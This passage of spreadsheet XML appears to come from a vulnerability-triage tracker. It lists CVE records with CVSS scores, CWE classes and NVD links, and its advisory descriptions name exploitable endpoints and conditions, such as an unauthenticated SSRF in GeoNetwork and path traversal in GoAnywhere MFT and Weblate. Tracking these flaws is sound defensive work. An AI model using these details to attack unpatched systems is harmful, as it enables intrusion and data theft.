      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R416"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S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R417"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S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86504</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing project-trust confirmation before building a Dev Container allowed host-level code execution</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86504</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9852</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>A CSV injection vulnerability exists in SYS600. Injected malicious formulas can add or modify data to the spreadsheet, insert links, exfiltrate data, and in some cases, depending on how the user has their environment configured, execute malicious code on the user’s machine. To exploit this issue attackers would need a way to create arbitrary log messages. This could be achieved through normal functionality via SCIL scripts, a log injection vulnerability, or via the SYS600 broker. This vulnerability affects all Windows users regardless of their privilege level who can run the Notify service and export the log.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9852</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9853</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 which allows any user authenticated to the operating system of the server hosting the application to read and modify application objects without being authenticated to the SYS600 system itself.
Only the SYS600 system users should be permitted to view and modify application objects.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9853</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9854</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 RBAC mechanism where users having access to the engineering tools could elevate their privileges to administrator level on the underlying Windows host, granting themselves full control over the host machine.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9854</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>psirt@purestorage.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15913</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>df4dee71-de3a-4139-9588-11b62fe6c0ff</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>In versions prior to 7.10.2 a path traversal vulnerability in the /attachRemoteFiles endpoint of Fortra's GoAnywhere MFT allows Web Users with both Secure Folders and Secure Mail permissions to escape their sandboxed home directory, achieving arbitrary file read.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15913</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34948</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, only classes present in the SELECT clause are protected by the silos access check in OQL. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34948</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55658</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In 3e595f3 and prior, when a streaming proposal is funded, the cluster of streaming contracts moves real pool funds into the proposal's StreamingEscrow to back the Superfluid constant flow agreement (the CFA deposit, plus a 0.5 percent margin). cancelProposal then zeroes the escrow's GDA member units but never reclaims that parked balance, and the permissionless claim() forwards the escrow's entire balance, including the pool funded buffer, to the beneficiary. The beneficiary is chosen by the proposal submitter and defaults to the submitter. The only path that returns escrow funds to the pool is drainToStrategy, which is onlyStrategy and is reached solely from the dispute reject ruling, never from cancel or natural completion. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55658</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55864</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr">
        <is>
          <t>maven:org.geonetwork-opensource:gn-web-app</t>
        </is>
      </c>
      <c r="M426" s="5" t="inlineStr">
        <is>
          <t>4.2.17, 4.4.12</t>
        </is>
      </c>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr"/>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>### Summary
An unauthenticated server-side request forgery vulnerability lets any anonymous user make the GeoNetwork server issue arbitrary outbound HTTP requests. This gives an external attacker a position inside the server's network, making it possible to make internal requests no matter if the response is XML-type or not.
The SLD tooling endpoint `POST /api/tools/ogc/sld` takes a caller-supplied **WMS server URL** and performs a **server-side HTTP GET** to it, with no validation. The fetched body can also be stored and downloaded if the output of the outbound request is in XML format, making the SSRF non-blind.
### Impact
Any unauthenticated user can make the server send arbitrary HTTP requests to internal hosts it would never expose publicly, and read the responses back if the request responses are XML. This enables internal data disclosure, for example, configuration files that return as XML, authorization bypass, and reconnaissance of the internal network all from an anonymous position.
### Resolution 
Patched releases:
* 4.4.12
* 4.2.17
### Resources
* https://github.com/geonetwork/core-geonetwork/pull/9343</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55864</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57171</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the catalog-generate, profile-generate, and ssp-generate author commands write generated Markdown to an attacker-influenced output path without path-traversal validation, allowing arbitrary file write outside the Trestle workspace. These commands join the user-supplied output argument onto the Trestle root and write to the result, but guard it only with an is_directory_name_allowed() task-name-collision check rather than the PathSecurityValidator.validate_local_path() guard used by the jinja command, so an absolute path or one containing traversal sequences escapes the workspace and writes files under an attacker-chosen location as the invoking process owner. The security boundary is crossed when a trusted CI job, shared service, or wrapper derives the output argument from repository-controlled, tenant-controlled, or otherwise untrusted data while expecting output to stay inside the workspace. When --force-overwrite is used, the selected output directory is first recursively deleted, extending the primitive to destruction of an attacker-chosen directory tree and enabling indirect code execution by overwriting files a pipeline later runs. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57171</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61617</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for the Pterodactyl game-server management panel. In versions up to and including 1.13.2, the SFTP write path does not enforce a server's disk quota during a transfer, allowing a tenant with SFTP write access to a single server to exhaust the host node's physical disk and take down every server on it. Wings checks available space only once, as a boolean, when the write handle is opened, using a stale cached usage value and without knowing the size of the incoming data, and it then returns a raw, unaccounted file handle that is never re-checked as the transfer proceeds. A single upload can therefore be written without bound, far beyond the configured disk limit, until the node's disk is full, and because a server stopped for exceeding its limit is not treated as suspended, SFTP writes are still accepted even after the quota is already exceeded. This issue is fixed in version 1.13.3.</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61617</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61792</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-693</t>
        </is>
      </c>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a project administrator can read files outside their repository through the App store metadata download feature, which resolves attacker-influenced paths without adequately confining them to the repository. This is an incomplete fix for CVE-2026-34242, whose original patch failed to fully prevent the path traversal, allowing the arbitrary file read to persist. A user with project-administrator privileges can therefore disclose the contents of files on the Weblate host that lie outside the project's repository. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61792</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77646</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-918</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability has been reported in PTC Windchill PDMLink and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77646</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R43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431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
